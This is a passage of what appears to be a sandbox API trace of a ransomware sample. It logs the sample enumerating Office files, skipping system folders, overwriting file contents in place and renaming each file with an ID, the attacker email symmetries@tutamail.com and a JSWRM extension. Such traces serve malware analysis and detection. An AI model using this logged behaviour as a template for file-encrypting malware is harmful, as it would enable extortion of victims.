Size=0x80) returned 0x2254c0 [0115.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0115.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0115.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.781] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgwiz.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGWIZ.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgwiz.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0115.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0115.783] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff580e7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4870, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ospintl.dll", cAlternateFileName="")) returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2=".") returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="..") returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="...") returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="windows") returned -1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="recovery") returned -1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="perflogs") returned -1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="documents and settings") returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="$RECYCLE.BIN") returned 1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="system volume information") returned -1 [0115.783] lstrcmpiW (lpString1="ospintl.dll", lpString2="msocache") returned 1 [0115.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ospintl.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ospintl.dll", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ospintl.dll", lpUsedDefaultChar=0x0) returned 11 [0115.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0115.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ospintl.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ospintl.dll", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ospintl.dll", lpUsedDefaultChar=0x0) returned 11 [0115.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0115.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0115.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0115.783] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa284551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa284551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa2f6cec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTFORM.DAT", cAlternateFileName="")) returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2=".") returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="..") returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="...") returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="windows") returned -1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="recovery") returned -1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="perflogs") returned -1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="documents and settings") returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="$RECYCLE.BIN") returned 1 [0115.783] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="system volume information") returned -1 [0115.784] lstrcmpiW (lpString1="OUTFORM.DAT", lpString2="msocache") returned 1 [0115.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTFORM.DAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTFORM.DAT", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTFORM.DAT", lpUsedDefaultChar=0x0) returned 11 [0115.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0115.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTFORM.DAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTFORM.DAT", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTFORM.DAT", lpUsedDefaultChar=0x0) returned 11 [0115.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0115.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0115.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0115.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTFORM.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outform.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.785] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=93696) returned 1 [0115.785] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16e00) returned 0x24c1d0 [0115.785] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x16e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x16e00, lpOverlapped=0x0) returned 1 [0115.860] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.860] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x16e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x16e00, lpOverlapped=0x0) returned 1 [0115.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.861] CloseHandle (hObject=0x238) returned 1 [0115.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0115.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0115.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0115.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.862] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTFORM.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outform.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTFORM.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outform.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0115.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0115.863] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8e89fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8e89fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x721a58, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLLIBR.DLL", cAlternateFileName="")) returned 1 [0115.863] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2=".") returned 1 [0115.863] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="..") returned 1 [0115.863] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="...") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="windows") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="recovery") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="perflogs") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="documents and settings") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="system volume information") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLLIBR.DLL", lpString2="msocache") returned 1 [0115.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0115.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0115.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0115.864] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9c1bf71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1467a6, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK.HOL", cAlternateFileName="")) returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2=".") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="..") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="...") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="windows") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="recovery") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="perflogs") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="documents and settings") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="$RECYCLE.BIN") returned 1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="system volume information") returned -1 [0115.864] lstrcmpiW (lpString1="OUTLOOK.HOL", lpString2="msocache") returned 1 [0115.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HOL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HOL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.HOL", lpUsedDefaultChar=0x0) returned 11 [0115.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0115.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0115.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HOL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HOL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.HOL", lpUsedDefaultChar=0x0) returned 11 [0115.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0115.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0115.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0115.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.865] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1337254) returned 1 [0115.865] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0115.866] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0115.885] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.885] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0115.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.885] CloseHandle (hObject=0x238) returned 1 [0115.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0115.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0115.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0115.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hol"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HOL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hol.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.887] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9c1bf71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa538a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK.HXS", cAlternateFileName="")) returned 1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2=".") returned 1 [0115.887] lstrcmpiW 